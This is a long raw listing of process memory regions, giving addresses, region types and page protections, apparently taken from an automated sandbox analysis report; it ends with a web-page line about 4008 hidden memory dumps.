23BCC904000
heap
page read and write
7664D6B000
stack
page read and write
2462D120000
heap
page read and write
1BD9F000
stack
page read and write
25C1000
trusted library allocation
page read and write
2DFA7B000
stack
page read and write
1B0E0000
heap
page read and write
174F1A28000
trusted library allocation
page read and write
7FFE1A45E000
unkown
page read and write
281AC04F000
heap
page read and write
1C829BF4000
heap
page read and write
2462D14B000
heap
page read and write
DE0000
heap
page read and write
7FFD9A7B4000
trusted library allocation
page read and write
21B78ED0000
heap
page read and write
1C098B30000
trusted library allocation
page read and write
174F199D000
heap
page read and write
16CEEED0000
heap
page read and write
281AB617000
heap
page read and write
7FF64489B000
unkown
page readonly
21B78F9F000
heap
page read and write
281ABE9E000
heap
page read and write
281AC920000
direct allocation
page read and write
1BC90000
heap
page execute and read and write
227EEDF8000
heap
page read and write
26469AB8000
heap
page read and write
2074DB10000
heap
page read and write
1C829B60000
heap
page read and write
E82B5AC000
stack
page read and write
281ABE7F000
heap
page read and write
1FCD67D5000
heap
page read and write
1412F610000
heap
page read and write
19522C95000
heap
page read and write
2224EDD0000
trusted library allocation
page read and write
1DFF323D000
direct allocation
page read and write
281AC3E4000
direct allocation
page read and write
AB6B87F000
stack
page read and write
174F19B3000
heap
page read and write
281AC4A8000
direct allocation
page read and write
47B9DFF000
unkown
page read and write
1FCD6080000
trusted library allocation
page read and write
281ABF1D000
heap
page read and write
281ABE4F000
heap
page read and write
281AB637000
heap
page read and write
281ABF1D000
heap
page read and write
281AB66A000
heap
page read and write
281ACA04000
heap
page read and write
16CEEF16000
heap
page read and write
7FFE1463E000
unkown
page execute and read and write
281AC093000
heap
page read and write
1BFD0754000
heap
page read and write
1BF40000
heap
page read and write
281AB6D3000
heap
page read and write
281ABF60000
heap
page read and write
23BCE994000
heap
page read and write
281AC9EA000
heap
page read and write
2646A134000
heap
page read and write
2A00000
heap
page execute and read and write
7FFE14647000
unkown
page execute and write copy
174F0EF3000
trusted library allocation
page read and write
281AC995000
heap
page read and write
1DFEFC80000
heap
page read and write
281AC9EA000
heap
page read and write
13061000
trusted library allocation
page read and write
1FCD6191000
heap
page read and write
281AC08E000
heap
page read and write
12A5E030000
heap
page read and write
2462D104000
heap
page read and write
21B794F3000
heap
page read and write
2DDB4EDF000
heap
page read and write
1F23D310000
trusted library section
page read and write
281AC101000
heap
page read and write
1F8B2728000
heap
page read and write
17D13C4C000
heap
page read and write
174F0EF7000
trusted library allocation
page read and write
1DFF31B1000
direct allocation
page read and write
19522CBD000
heap
page read and write
19525FFD000
heap
page read and write
1C099210000
heap
page read and write
227EECB0000
heap
page read and write
281ABA40000
heap
page read and write
1203000
heap
page read and write
1F23D1C4000
heap
page read and write
1DC5D151000
heap
page read and write
174F19B3000
heap
page read and write
281ABA75000
heap
page read and write
4223DFF000
stack
page read and write
20354F2D000
heap
page read and write
281ACA17000
heap
page read and write
23BCD00E000
heap
page read and write
74F000
heap
page read and write
227EEE07000
heap
page read and write
281ABB20000
direct allocation
page read and write
16CEEEEA000
heap
page read and write
2646A2A9000
heap
page read and write
7FFE0EC69000
unkown
page execute and read and write
281AD1C0000
direct allocation
page read and write
1F225365000
trusted library allocation
page read and write
13EA000
heap
page read and write
16CEEF3D000
heap
page read and write
17D13E10000
heap
page read and write
26469AB6000
heap
page read and write
1FCD67DC000
heap
page read and write
22249840000
heap
page read and write
7FFD9A7C3000
trusted library allocation
page read and write
23F8AB81000
heap
page read and write
21B78F77000
heap
page read and write
1DFEFC45000
heap
page read and write
16CEEF76000
heap
page read and write
281AB67B000
heap
page read and write
281AB55C000
direct allocation
page read and write
7FFD9A7CD000
trusted library allocation
page execute and read and write
19525FFD000
heap
page read and write
281ABA90000
heap
page read and write
281ABF4F000
heap
page read and write
BE4000
heap
page read and write
246308BB000
trusted library allocation
page read and write
BD0000
heap
page read and write
1CC34E4B000
heap
page read and write
C2F0BDD000
stack
page read and write
16002900000
heap
page read and write
281AC9C6000
heap
page read and write
1FCD67E9000
heap
page read and write
7FFD9A961000
trusted library allocation
page read and write
23671384000
heap
page read and write
16CEF160000
trusted library allocation
page read and write
AB6B5DF000
stack
page read and write
16CEEE20000
heap
page read and write
281AC9EE000
heap
page read and write
174F1998000
heap
page read and write
7FFD9AB00000
trusted library allocation
page read and write
26469B37000
heap
page read and write
281A9BE0000
heap
page read and write
23BCC93E000
heap
page read and write
F9D000
heap
page read and write
16CEEF5F000
heap
page read and write
21B78F00000
trusted library allocation
page read and write
1DA81850000
heap
page read and write
26469A92000
heap
page read and write
281AC8B0000
direct allocation
page read and write
7FFD9A940000
trusted library allocation
page read and write
281AC9C6000
heap
page read and write
21B78FB4000
heap
page read and write
281ACD88000
heap
page read and write
281ABA09000
heap
page read and write
1F225215000
trusted library allocation
page read and write
2224F0FF000
trusted library allocation
page read and write
281ACD8F000
heap
page read and write
7FFD9AAF0000
trusted library allocation
page read and write
281AC9A5000
heap
page read and write
7FFD9A8F0000
trusted library allocation
page execute and read and write
2462D0DF000
heap
page read and write
1B0EE000
heap
page read and write
12A5E0A6000
heap
page read and write
21B78F5E000
heap
page read and write
2F005FE000
unkown
page readonly
174F198E000
heap
page read and write
2BCE000
stack
page read and write
7FFD9A7EC000
trusted library allocation
page execute and read and write
7FFD9A984000
trusted library allocation
page read and write
23BCD028000
heap
page read and write
A977FCF000
stack
page read and write
174F1B3C000
heap
page read and write
19525FAB000
heap
page read and write
281AB6BF000
heap
page read and write
26469A92000
heap
page read and write
BA040CB000
stack
page read and write
D30317000
stack
page read and write
281AB630000
heap
page read and write
21B78EA0000
heap
page read and write
2684AF00000
heap
page read and write
281AC04F000
heap
page read and write
281AC8A0000
direct allocation
page read and write
1FCD67CF000
heap
page read and write
7FFD9A85C000
trusted library allocation
page execute and read and write
1DFEFC9A000
heap
page read and write
21B78FCB000
heap
page read and write
281ABDEC000
heap
page read and write
1C099207000
heap
page read and write
16CEEF23000
heap
page read and write
2074DB07000
heap
page read and write
281AB9CC000
heap
page read and write
12A5E0B7000
heap
page read and write
1FCD5F60000
heap
page read and write
1FCD67DC000
heap
page read and write
19525F8C000
heap
page read and write
65A9C7E000
stack
page read and write
BFA92FF000
stack
page read and write
281ABF48000
heap
page read and write
281AC8C0000
direct allocation
page read and write
16CEEF23000
heap
page read and write
281AC900000
direct allocation
page read and write
281ACA2F000
heap
page read and write
1269000
heap
page read and write
1D37210F000
heap
page read and write
211E2F91000
heap
page read and write
2E3F000
stack
page read and write
1B8AC2A1000
heap
page read and write
26469AAF000
heap
page read and write
2538CB20000
heap
page read and write
281AD1A0000
direct allocation
page read and write
281ABA09000
heap
page read and write
174F199E000
heap
page read and write
7FFD9A876000
trusted library allocation
page execute and read and write
2367112A000
heap
page read and write
281ACBF4000
heap
page read and write
1FCD8150000
heap
page read and write
1F224A20000
heap
page read and write
174F0EFF000
trusted library allocation
page read and write
1FCD6196000
heap
page read and write
1C098C5F000
heap
page read and write
2462E9D0000
trusted library allocation
page read and write
2224ED00000
trusted library allocation
page read and write
1C09AB94000
heap
page read and write
1F23D0A0000
heap
page read and write
7375EFF000
stack
page read and write
2F7FD7E000
unkown
page readonly
1BBFE000
stack
page read and write
ED0000
heap
page read and write
1C098BD0000
heap
page read and write
21B78F54000
heap
page read and write
281ACB37000
heap
page read and write
9E05B1C000
stack
page read and write
1C098C35000
heap
page read and write
281AC950000
direct allocation
page read and write
7FFD9A952000
trusted library allocation
page read and write
21B78F77000
heap
page read and write
7FFD9A7E0000
trusted library allocation
page read and write
FD1000
heap
page read and write
1B3F6A68000
heap
page read and write
1370000
heap
page read and write
21253450000
heap
page read and write
1DC5D090000
heap
page read and write
636B1FF000
stack
page read and write
281AC118000
heap
page read and write
70EA33C000
stack
page read and write
16CEEE80000
heap
page read and write
12FD000
heap
page read and write
2262DAF0000
heap
page read and write
17D13B90000
heap
page read and write
BA02F7F000
stack
page read and write
16CEEF7D000
heap
page read and write
2646A2AF000
heap
page read and write
281AB92A000
heap
page read and write
1DFEFBE0000
heap
page read and write
281ACB6D000
heap
page read and write
1FCD613E000
heap
page read and write
23671132000
heap
page read and write
BA0367B000
stack
page read and write
1DFF31A2000
direct allocation
page read and write
7FFD9AB0C000
trusted library allocation
page read and write
174F1A27000
trusted library allocation
page read and write
281ABE60000
heap
page read and write
2224F072000
trusted library allocation
page read and write
19522C94000
heap
page read and write
1F8B2731000
heap
page read and write
E8C8AFE000
stack
page read and write
281ACA16000
heap
page read and write
15C0000
trusted library allocation
page read and write
7FFDF8664000
unkown
page execute and read and write
2646A2B7000
heap
page read and write
23BCC925000
heap
page read and write
2224F0F4000
trusted library allocation
page read and write
281ACE42000
heap
page read and write
7FF71F138000
unkown
page readonly
1C829BF0000
heap
page read and write
21B7ADEE000
heap
page read and write
19525F71000
heap
page read and write
1D37211C000
heap
page read and write
12A5E0D9000
heap
page read and write
21253440000
heap
page read and write
2DDB4E90000
heap
page read and write
12A5E0A5000
heap
page read and write
23BCC932000
heap
page read and write
281ACB4D000
heap
page read and write
7FFD9A870000
trusted library allocation
page read and write
174F1B27000
heap
page read and write
212531D0000
heap
page read and write
195269FA000
heap
page read and write
281AC03E000
heap
page read and write
21B7ADE1000
heap
page read and write
16CEEF23000
heap
page read and write
25F377C0000
heap
page read and write
2FB0000
heap
page read and write
1BFD0620000
heap
page read and write
21B78F5A000
heap
page read and write
2646BB2E000
heap
page read and write
1FCD8160000
heap
page read and write
1D3720F0000
heap
page read and write
281ABEC3000
heap
page read and write
1EC76621000
heap
page read and write
21B794FC000
heap
page read and write
23E90770000
heap
page read and write
1F8B28E0000
heap
page read and write
17D13B70000
heap
page read and write
1C099203000
heap
page read and write
24646FEA000
heap
page read and write
16CEEF5F000
heap
page read and write
2A04CF69000
heap
page read and write
16CEEF1D000
heap
page read and write
1DA81A50000
heap
page read and write
BA03378000
stack
page read and write
26469A94000
heap
page read and write
2646A130000
heap
page read and write
281ACBED000
heap
page read and write
22216300000
heap
page read and write
281ACA0A000
heap
page read and write
281ACBF5000
heap
page read and write
1C099221000
heap
page read and write
12E48000
trusted library allocation
page read and write
281ABEF8000
heap
page read and write
281ABEDC000
heap
page read and write
1FCD6199000
heap
page read and write
1EC76700000
heap
page read and write
281AC930000
direct allocation
page read and write
174F1932000
heap
page read and write
2646A13E000
heap
page read and write
23BCD01F000
heap
page read and write
7FFD9A7B0000
trusted library allocation
page read and write
1FCD632A000
heap
page read and write
281AC39C000
direct allocation
page read and write
281ABE3C000
heap
page read and write
281AC9CE000
heap
page read and write
21B78FDE000
heap
page read and write
1F22314F000
heap
page read and write
281ABF64000
heap
page read and write
11FEAFC000
stack
page read and write
16CEEF00000
heap
page read and write
2DDB4EC7000
heap
page read and write
281ABEE0000
heap
page read and write
281ABF60000
heap
page read and write
264699F0000
heap
page read and write
2224A11A000
heap
page read and write
7FF71F100000
unkown
page readonly
1C09920A000
heap
page read and write
1B17E000
heap
page read and write
174F0F00000
trusted library allocation
page read and write
23BCC932000
heap
page read and write
281ABA3E000
heap
page read and write
23BCD017000
heap
page read and write
26469CF4000
heap
page read and write
1DFF3130000
direct allocation
page read and write
281ABA75000
heap
page read and write
174F19B3000
heap
page read and write
21B78F9F000
heap
page read and write
2462E9F0000
trusted library allocation
page read and write
2646A280000
heap
page read and write
1FCD614D000
heap
page read and write
19522C70000
heap
page read and write
281ACD80000
heap
page read and write
1C09AB8E000
heap
page read and write
2224F0FC000
trusted library allocation
page read and write
281AC8B0000
direct allocation
page read and write
F0D000
heap
page read and write
1F23D090000
heap
page execute and read and write
1FCD67F2000
heap
page read and write
16CEEF72000
heap
page read and write
1F8B2710000
heap
page read and write
22216330000
heap
page read and write
281ABF4C000
heap
page read and write
7FFDF8667000
unkown
page execute and read and write
24647385000
heap
page read and write
21B7ADF4000
heap
page read and write
19525AA5000
heap
page read and write
281ABA23000
heap
page read and write
281ABE66000
heap
page read and write
23699F64000
heap
page read and write
1D6BD01B000
heap
page read and write
D198CF7000
stack
page read and write
23BCCB1B000
heap
page read and write
25B4F080000
heap
page read and write
281AC09B000
heap
page read and write
281AC9D1000
heap
page read and write
174F1A34000
trusted library allocation
page read and write
281ACB27000
heap
page read and write
19525FED000
heap
page read and write
281AB96D000
heap
page read and write
21B78FBF000
heap
page read and write
21547701000
heap
page read and write
22249891000
heap
page read and write
1DFEFC9C000
heap
page read and write
174F19BD000
heap
page read and write
1F8B2670000
heap
page read and write
264FC1C6000
heap
page read and write
1DFF3030000
direct allocation
page read and write
7FFDFB707000
unkown
page read and write
1FCD61A9000
heap
page read and write
1DA8188B000
heap
page read and write
23BCE996000
heap
page read and write
2224A640000
trusted library allocation
page read and write
1FCD618A000
heap
page read and write
1412F930000
heap
page read and write
2FE1000
trusted library allocation
page read and write
174F1B38000
heap
page read and write
16CEEF7D000
heap
page read and write
281ACC74000
heap
page read and write
16CEEEDD000
heap
page read and write
1280000
heap
page read and write
7FFDFB04C000
unkown
page read and write
1D37210F000
heap
page read and write
15E847F1000
heap
page read and write
7FF71F091000
unkown
page execute read
2224F06C000
trusted library allocation
page read and write
21B78ED4000
heap
page read and write
20354EC0000
heap
page read and write
19522D6B000
heap
page read and write
21B7ADE6000
heap
page read and write
2224ED12000
trusted library allocation
page read and write
1DFF2FB0000
direct allocation
page read and write
21B78F53000
heap
page read and write
174F1A3E000
trusted library allocation
page read and write
281AC920000
direct allocation
page read and write
2462D360000
heap
page read and write
6F2BAFF000
unkown
page read and write
281AC8B0000
direct allocation
page read and write
281ABF4F000
heap
page read and write
7FFD9A7A4000
trusted library allocation
page read and write
2A75F5E1000
heap
page read and write
2646A2AA000
heap
page read and write
1530000
heap
page read and write
174F1A25000
trusted library allocation
page read and write
281ABF2B000
heap
page read and write
281AC11A000
heap
page read and write
16002910000
heap
page read and write
24647279000
heap
page read and write
7FFD9AB10000
trusted library allocation
page read and write
281ACD3E000
heap
page read and write
1C098C61000
heap
page read and write
264FC1ED000
heap
page read and write
281AC8E0000
direct allocation
page read and write
B0EABFF000
stack
page read and write
2462D396000
heap
page read and write
71C000
heap
page read and write
1412F6F0000
heap
page read and write
281AC03E000
heap
page read and write
1E835A31000
heap
page read and write
16CEEF46000
heap
page read and write
1AB4D000
stack
page read and write
281AC09E000
heap
page read and write
1306000
heap
page read and write
281ACFCB000
heap
page read and write
23699F53000
heap
page read and write
281ABF76000
heap
page read and write
174F199C000
heap
page read and write
12A5E0DE000
heap
page read and write
16CEEEDD000
heap
page read and write
147F000
stack
page read and write
1C829BF5000
heap
page read and write
1C09AB70000
heap
page read and write
7FFDF865F000
unkown
page execute and read and write
281ABF20000
heap
page read and write
16CEEF63000
heap
page read and write
7FFD9ABB0000
trusted library allocation
page read and write
7FFD9AAF9000
trusted library allocation
page read and write
F97000
heap
page read and write
281AC9E4000
heap
page read and write
281ACB6F000
heap
page read and write
7FFD9A850000
trusted library allocation
page read and write
7FFDFF247000
unkown
page execute and read and write
23BCD031000
heap
page read and write
281ABFBF000
heap
page read and write
7FFD9A951000
trusted library allocation
page read and write
1FCD67CC000
heap
page read and write
70EA179000
stack
page read and write
12A5E0D0000
heap
page read and write
1412F720000
heap
page read and write
5CA4FFF000
stack
page read and write
7FFD9A7D3000
trusted library allocation
page execute and read and write
2462D3A4000
heap
page read and write
21B78DC0000
heap
page read and write
7FF644870000
unkown
page readonly
C5C9A7E000
stack
page read and write
1E880020000
heap
page read and write
7FF6448B4000
unkown
page readonly
281AC0AE000
heap
page read and write
1E835A31000
heap
page read and write
1E835A31000
heap
page read and write
6E51E7F000
stack
page read and write
246308B6000
trusted library allocation
page read and write
7FFD9AA10000
trusted library allocation
page read and write
1230000
trusted library allocation
page read and write
1C099242000
heap
page read and write
7C5000
heap
page read and write
A1CDBCC000
stack
page read and write
281ABF4C000
heap
page read and write
7FF6448AE000
unkown
page read and write
19522CEF000
heap
page read and write
23BCD007000
heap
page read and write
174F0F01000
trusted library allocation
page read and write
1C099242000
heap
page read and write
281AC534000
direct allocation
page read and write
174F1996000
heap
page read and write
281AC08B000
heap
page read and write
281ABF08000
heap
page read and write
5CA4EFF000
unkown
page read and write
1B8AC280000
heap
page read and write
1C098C26000
heap
page read and write
1FCD618E000
heap
page read and write
1320000
trusted library allocation
page read and write
7FFDFB64B000
unkown
page execute and read and write
7FFD9AA80000
trusted library allocation
page read and write
19522C99000
heap
page read and write
25B4F16B000
heap
page read and write
281AC09A000
heap
page read and write
25F3780E000
heap
page read and write
16CEEF26000
heap
page read and write
281ABA75000
heap
page read and write
65A99A7000
stack
page read and write
16CEEEA7000
heap
page read and write
281ACBC3000
heap
page read and write
2646A295000
heap
page read and write
1E835950000
heap
page read and write
19522D1F000
heap
page read and write
11EE000
stack
page read and write
1BAE0000
heap
page read and write
281ABA3E000
heap
page read and write
281ACBED000
heap
page read and write
2462EA10000
heap
page execute and read and write
281AC11A000
heap
page read and write
11FEBFF000
unkown
page read and write
281AC11C000
heap
page read and write
7FFD9A7F0000
trusted library allocation
page read and write
281AC07C000
heap
page read and write
281AC9CC000
heap
page read and write
6F2B74C000
stack
page read and write
19522D5F000
heap
page read and write
BA033FA000
stack
page read and write
7FFD9A876000
trusted library allocation
page execute and read and write
264FC1C5000
heap
page read and write
1375000
heap
page read and write
116F000
heap
page read and write
2463EA91000
trusted library allocation
page read and write
136D000
heap
page read and write
16CEEECD000
heap
page read and write
1FCD632A000
heap
page read and write
A7ED67000
stack
page read and write
10CF000
stack
page read and write
1BCFE000
stack
page read and write
12A5E0B9000
heap
page read and write
B10000
trusted library allocation
page read and write
281AC998000
heap
page read and write
2A1302C2000
heap
page read and write
2155A770000
heap
page read and write
2074DD70000
heap
page read and write
2F004FB000
stack
page read and write
222498AB000
heap
page read and write
174F1B2E000
heap
page read and write
1FCD6147000
heap
page read and write
1FCD6138000
heap
page read and write
1F2230D6000
heap
page read and write
281ABF76000
heap
page read and write
7FFD9A86C000
trusted library allocation
page execute and read and write
281AC10E000
heap
page read and write
281AC07C000
heap
page read and write
D3077E000
stack
page read and write
16CEEF16000
heap
page read and write
EC460FF000
unkown
page read and write
1DFEFC33000
heap
page read and write
1C098C36000
heap
page read and write
174F0F20000
heap
page read and write
9E4000
heap
page read and write
23BCC905000
heap
page read and write
23671103000
heap
page read and write
BA034FF000
stack
page read and write
22249929000
heap
page read and write
2224EF02000
heap
page read and write
1FCD6327000
heap
page read and write
23E90A24000
heap
page read and write
C2F403F000
stack
page read and write
7D0000
heap
page read and write
281AC118000
heap
page read and write
281ABE5F000
heap
page read and write
7FFE0EC41000
unkown
page execute and read and write
1B8AC200000
heap
page read and write
264FC1ED000
heap
page read and write
281ABFBF000
heap
page read and write
E82B8FF000
stack
page read and write
FE7511B000
stack
page read and write
281ABA73000
heap
page read and write
23BCC91E000
heap
page read and write
174F0F10000
heap
page readonly
281ACA01000
heap
page read and write
281AB9E1000
heap
page read and write
7FFD9A9D0000
trusted library allocation
page read and write
7FFD9A8A6000
trusted library allocation
page execute and read and write
7FFD9A9B0000
trusted library allocation
page read and write
7FF71F12E000
unkown
page read and write
2224F015000
trusted library allocation
page read and write
281ABF24000
heap
page read and write
2646A13E000
heap
page read and write
1F224F0C000
trusted library allocation
page read and write
281AC092000
heap
page read and write
2FEF000
trusted library allocation
page read and write
16CEEF7D000
heap
page read and write
15E849F0000
heap
page read and write
23671138000
heap
page read and write
7FFD9A7ED000
trusted library allocation
page execute and read and write
7FFD9A9A0000
trusted library allocation
page execute and read and write
281ABF04000
heap
page read and write
2262D950000
heap
page read and write
7FF64489B000
unkown
page readonly
7FFD9A7DD000
trusted library allocation
page execute and read and write
19524FC1000
heap
page read and write
1CC34E61000
heap
page read and write
23BCD00C000
heap
page read and write
281AC9CC000
heap
page read and write
7FFE14631000
unkown
page execute and read and write
24B0000
heap
page read and write
F01000
heap
page read and write
1DB98000
heap
page read and write
70E9F7C000
stack
page read and write
281ABF4C000
heap
page read and write
1300000
heap
page read and write
2646A288000
heap
page read and write
174F1A80000
trusted library allocation
page execute
177E000
stack
page read and write
1476000
heap
page read and write
A1CDFFF000
stack
page read and write
281AC518000
direct allocation
page read and write
281ACED2000
heap
page read and write
174F194A000
heap
page read and write
160026E1000
heap
page read and write
1FCD6184000
heap
page read and write
1C098C61000
heap
page read and write
766517E000
stack
page read and write
21253210000
heap
page read and write
264FC1EE000
heap
page read and write
281AB60B000
heap
page read and write
23671380000
heap
page read and write
2646A287000
heap
page read and write
281AC033000
heap
page read and write
21B79509000
heap
page read and write
281AC0A4000
heap
page read and write
7FFD9A7AD000
trusted library allocation
page execute and read and write
7FFD9A860000
trusted library allocation
page execute and read and write
7FFD9A850000
trusted library allocation
page execute and read and write
1DFF2F90000
direct allocation
page read and write
BA02E73000
stack
page read and write
281AC9BC000
heap
page read and write
1C098C44000
heap
page read and write
1CA952C2000
heap
page read and write
281AB644000
heap
page read and write
1F23D0AE000
heap
page read and write
1D37210F000
heap
page read and write
1DC5D148000
heap
page read and write
6E51B59000
stack
page read and write
281ABF76000
heap
page read and write
23BCD031000
heap
page read and write
174F1941000
heap
page read and write
1DFEFC27000
heap
page read and write
1C098C6D000
heap
page read and write
1B72E000
stack
page read and write
281AC980000
direct allocation
page read and write
195246D0000
heap
page read and write
1D6BCF74000
heap
page read and write
281ABE6E000
heap
page read and write
1FCD61A3000
heap
page read and write
174F1B2B000
heap
page read and write
7FFDF8602000
unkown
page execute and read and write
EE0000
heap
page read and write
1FCD6167000
heap
page read and write
131B8000
trusted library allocation
page read and write
16CEF1AC000
heap
page read and write
23BCC8F5000
heap
page read and write
1C098C02000
heap
page read and write
281ACA2F000
heap
page read and write
7FFDFF212000
unkown
page execute and read and write
C2F11BE000
stack
page read and write
21B78FC6000
heap
page read and write
174F199E000
heap
page read and write
281ACB2A000
heap
page read and write
2462EB17000
trusted library allocation
page read and write
281ABF4C000
heap
page read and write
2646BB21000
heap
page read and write
281AC098000
heap
page read and write
1BA70000
heap
page read and write
19525FBD000
heap
page read and write
174F1941000
heap
page read and write
1C09AB94000
heap
page read and write
2DDB4EB5000
heap
page read and write
24646AC0000
trusted library allocation
page read and write
390000
heap
page read and write
281AC04F000
heap
page read and write
1C098C58000
heap
page read and write
281AC99E000
heap
page read and write
281AC0A4000
heap
page read and write
23BCD014000
heap
page read and write
7FFDFF190000
unkown
page readonly
16CF0B00000
heap
page read and write
281ACD86000
heap
page read and write
281ABA6D000
heap
page read and write
281ABF76000
heap
page read and write
281ABE55000
heap
page read and write
2C408FB000
stack
page read and write
1D373B05000
heap
page read and write
2646A13B000
heap
page read and write
1FCD6185000
heap
page read and write
1EC7660B000
heap
page read and write
2462F7D1000
trusted library allocation
page read and write
12A5E0DE000
heap
page read and write
25F3780B000
heap
page read and write
16CEEF38000
heap
page read and write
281AC039000
heap
page read and write
22216368000
heap
page read and write
281AB922000
heap
page read and write
7FFD9AC00000
trusted library allocation
page read and write
1EC76621000
heap
page read and write
12A5E0D9000
heap
page read and write
7FFD9A7A2000
trusted library allocation
page read and write
281AC098000
heap
page read and write
281ABF21000
heap
page read and write
281AC0AE000
heap
page read and write
1249000
heap
page read and write
2F0000
unkown
page readonly
281ABF76000
heap
page read and write
23BCC8FF000
heap
page read and write
281AB6C2000
heap
page read and write
1C098C28000
heap
page read and write
2224ECE0000
trusted library allocation
page read and write
12633000
trusted library allocation
page read and write
2462D0C0000
heap
page read and write
1DFF3090000
direct allocation
page read and write
227EEFB0000
heap
page read and write
2074DB10000
heap
page read and write
7FFD9AAC0000
trusted library allocation
page read and write
281AC9D1000
heap
page read and write
1205000
heap
page read and write
160026CB000
heap
page read and write
174F1A60000
trusted library allocation
page read and write
FF5000
heap
page read and write
23BCC932000
heap
page read and write
C2F0FCE000
stack
page read and write
174F0F24000
heap
page read and write
281AB633000
heap
page read and write
281AB6B7000
heap
page read and write
21B7950A000
heap
page read and write
1F224DA0000
trusted library allocation
page read and write
1B3F6E00000
heap
page read and write
281AB6A0000
heap
page read and write
7FFD9A880000
trusted library allocation
page execute and read and write
2646A132000
heap
page read and write
2538CA20000
heap
page read and write
26469A10000
heap
page read and write
7FFD9A9C0000
trusted library allocation
page read and write
174F1A2F000
trusted library allocation
page read and write
1FCD6060000
heap
page read and write
281ABF3D000
heap
page read and write
16CEEF33000
heap
page read and write
16CEEF56000
heap
page read and write
26469ABE000
heap
page read and write
174F19B3000
heap
page read and write
281AC9CE000
heap
page read and write
24647368000
heap
page read and write
23BCD028000
heap
page read and write
1CA952C2000
heap
page read and write
12E41000
trusted library allocation
page read and write
1DFEFC28000
heap
page read and write
174F19B3000
heap
page read and write
2224F030000
trusted library allocation
page read and write
7FFD9A7D0000
trusted library allocation
page read and write
7FFD9A7C3000
trusted library allocation
page execute and read and write
19525F96000
heap
page read and write
281ABFBF000
heap
page read and write
7FFD9A7D4000
trusted library allocation
page read and write
2684AF20000
heap
page read and write
281AB6B1000
heap
page read and write
2DDB4EDD000
heap
page read and write
174F1A28000
trusted library allocation
page read and write
281AC8D0000
direct allocation
page read and write
195267FA000
heap
page read and write
62849DC000
stack
page read and write
281AC8B0000
direct allocation
page read and write
227EEFB5000
heap
page read and write
1FCD67EA000
heap
page read and write
2DDB4EC6000
heap
page read and write
There are 4008 hidden memdumps, click here to show them.